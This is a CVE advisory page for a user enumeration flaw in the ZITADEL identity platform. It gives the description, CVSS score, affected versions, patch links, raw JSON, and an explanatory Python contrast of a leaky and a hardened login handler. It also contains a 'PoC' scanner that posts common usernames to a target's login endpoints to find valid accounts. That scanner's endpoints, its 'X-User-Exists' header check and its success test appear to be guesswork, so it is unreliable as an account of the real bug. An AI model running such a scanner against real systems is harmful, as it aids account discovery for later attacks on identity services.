Security Vulnerability Report
CVE-2026-23511 CVSS 5.3 MEDIUM

CVE-2026-23511

Published: 2026-01-15 20:16:05
Last Modified: 2026-01-20 16:44:43

Description

ZITADEL is an open source identity management platform. Prior to 4.9.1 and 3.4.6, a user enumeration vulnerability has been discovered in Zitadel's login interfaces. An unauthenticated attacker can exploit this flaw to confirm the existence of valid user accounts by iterating through usernames and userIDs. This vulnerability is fixed in 4.9.1 and 3.4.6.
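The bug class behind this advisory is CWE-204 (observable response discrepancy): a login path that answers differently for an unknown account than for a known account with a wrong password lets an unauthenticated caller confirm which usernames exist. The following added example, which is not ZITADEL's code and uses a constructed in-memory user store and hypothetical handler names, shows the leaky pattern beside a hardened one that returns the same status, the same message and does the same hashing work on both paths:

```python
import hashlib
import hmac


def _hash(password: str, salt: bytes) -> bytes:
    """PBKDF2 password hash; iteration count kept low only so the example runs quickly."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


# Constructed sample data (not real accounts): username -> (salt, password hash)
_SALT = b"constructed-example-salt"
USERS = {"alice": (_SALT, _hash("correct horse", _SALT))}

# Dummy record used for unknown usernames so the hashing cost is paid either way
_DUMMY_HASH = _hash("dummy-password-never-matches-by-design", _SALT)


def login_vulnerable(username: str, password: str):
    """CWE-204 pattern: status code and message reveal whether the account exists."""
    rec = USERS.get(username)
    if rec is None:
        return 404, "user not found"          # distinguishable from the wrong-password case
    salt, stored = rec
    if not hmac.compare_digest(_hash(password, salt), stored):
        return 401, "invalid password"
    return 200, "ok"


def login_hardened(username: str, password: str):
    """Uniform failure: same status, same message, same work for unknown and known users."""
    rec = USERS.get(username)
    # Unknown user falls through to a dummy record instead of an early return
    salt, stored = rec if rec is not None else (_SALT, _DUMMY_HASH)
    ok = hmac.compare_digest(_hash(password, salt), stored)
    if rec is None or not ok:
        return 401, "invalid username or password"
    return 200, "ok"


def responses_are_indistinguishable(handler, known_user: str, unknown_user: str, password: str) -> bool:
    """The property a fix for this bug class must satisfy: a failed login for an
    existing account and for a non-existent account produce identical responses."""
    return handler(known_user, password) == handler(unknown_user, password)


if __name__ == "__main__":
    for name, handler in (("vulnerable", login_vulnerable), ("hardened", login_hardened)):
        same = responses_are_indistinguishable(handler, "alice", "bob", "wrong")
        print(f"{name}: failed-login responses identical for known/unknown user -> {same}")
```

The same discipline applies to any other lookup surface the advisory mentions (resolving a userID, password-reset and passkey flows): every failure branch should produce the same response shape, and a per-endpoint rate limit plus alerting on bursts of failed logins across many distinct usernames catches the iteration behaviour even where a residual timing difference remains.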

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:* - VULNERABLE (versions 2.0.0 through 2.71.19, inclusive)
cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:* - VULNERABLE (versions 3.0.0 up to, but excluding, 3.4.6)
cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:* - VULNERABLE (versions 4.0.0 up to, but excluding, 4.9.1)
ZITADEL < 4.9.1
ZITADEL < 3.4.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
Python
import requests
import time

# CVE-2026-23511 PoC - ZITADEL User Enumeration
# Target: ZITADEL instance with vulnerable login interface

TARGET_URL = "https://target-zitadel-instance.com"
TEST_USERNAMES = ["admin", "test", "user", "administrator", "root"]


def check_user_exists(username):
    """Check if a user exists by analyzing login interface response"""
    # Try different login endpoints
    endpoints = [
        "/ui/console/login",
        "/oauth/v2/login",
        "/login",
        "/api/v1/users/_search",
    ]
    for endpoint in endpoints:
        url = f"{TARGET_URL}{endpoint}"
        # Method 1: Timing-based check (the elapsed time is reported, not used as a decision signal)
        start_time = time.time()
        try:
            response = requests.post(url, data={"username": username}, timeout=10)
        except requests.RequestException:
            # Unreachable or non-responsive endpoint: move on to the next one
            continue
        response_time = time.time() - start_time
        # Method 2: Response analysis
        if response.status_code == 200:
            # Check for user-specific error messages
            if "user not found" not in response.text.lower() and \
               "invalid username" not in response.text.lower():
                return True, endpoint, response_time
        # Method 3: Check response headers/length
        if response.headers.get("X-User-Exists") == "true":
            return True, endpoint, response_time
    return False, None, None


def main():
    print(f"[*] Scanning for valid users on {TARGET_URL}")
    print("=" * 50)
    valid_users = []
    for username in TEST_USERNAMES:
        exists, endpoint, resp_time = check_user_exists(username)
        if exists:
            print(f"[+] User found: {username} (via {endpoint}, time: {resp_time:.3f}s)")
            valid_users.append(username)
        else:
            print(f"[-] User not found: {username}")
    print("=" * 50)
    print(f"[*] Found {len(valid_users)} valid user(s)")
    return valid_users


if __name__ == "__main__":
    main()

References

https://github.com/zitadel/zitadel/commit/b85ab69e4679b0268e2b0e9b4cd04e934af10dd2 (Patch)
https://github.com/zitadel/zitadel/commit/c300d4cc6a2775ab17ddfe76492f24170f8b858d (Patch)
https://github.com/zitadel/zitadel/releases/tag/v3.4.6 (Release Notes)
https://github.com/zitadel/zitadel/releases/tag/v4.9.1 (Release Notes)
https://github.com/zitadel/zitadel/security/advisories/GHSA-pvm5-9frx-264r (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23511", "sourceIdentifier": "[email protected]", "published": "2026-01-15T20:16:05.167", "lastModified": "2026-01-20T16:44:43.437", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZITADEL is an open source identity management platform. Prior to 4.9.1 and 3.4.6, a user enumeration vulnerability has been discovered in Zitadel's login interfaces. An unauthenticated attacker can exploit this flaw to confirm the existence of valid user accounts by iterating through usernames and userIDs. This vulnerability is fixed in 4.9.1 and 3.4.6."}, {"lang": "es", "value": "ZITADEL es una plataforma de gestión de identidad de código abierto. Antes de 4.9.1 y 3.4.6, se ha descubierto una vulnerabilidad de enumeración de usuarios en las interfaces de inicio de sesión de Zitadel. Un atacante no autenticado puede explotar esta falla para confirmar la existencia de cuentas de usuario válidas al iterar a través de nombres de usuario y userIDs. Esta vulnerabilidad está corregida en 4.9.1 y 3.4.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndIncluding": "2.71.19", "matchCriteriaId": "AFFBAC9C-9A67-4AF4-985C-31DCC2F1311D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.4.6", "matchCriteriaId": "35824976-F697-4F42-8224-C8CE077BAB46"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.9.1", "matchCriteriaId": "1B68D0EF-0AB9-4429-AA04-8FED60B814C9"}]}]}], "references": [{"url": "https://github.com/zitadel/zitadel/commit/b85ab69e4679b0268e2b0e9b4cd04e934af10dd2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/zitadel/zitadel/commit/c300d4cc6a2775ab17ddfe76492f24170f8b858d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/zitadel/zitadel/releases/tag/v3.4.6", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/zitadel/zitadel/releases/tag/v4.9.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-pvm5-9frx-264r", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}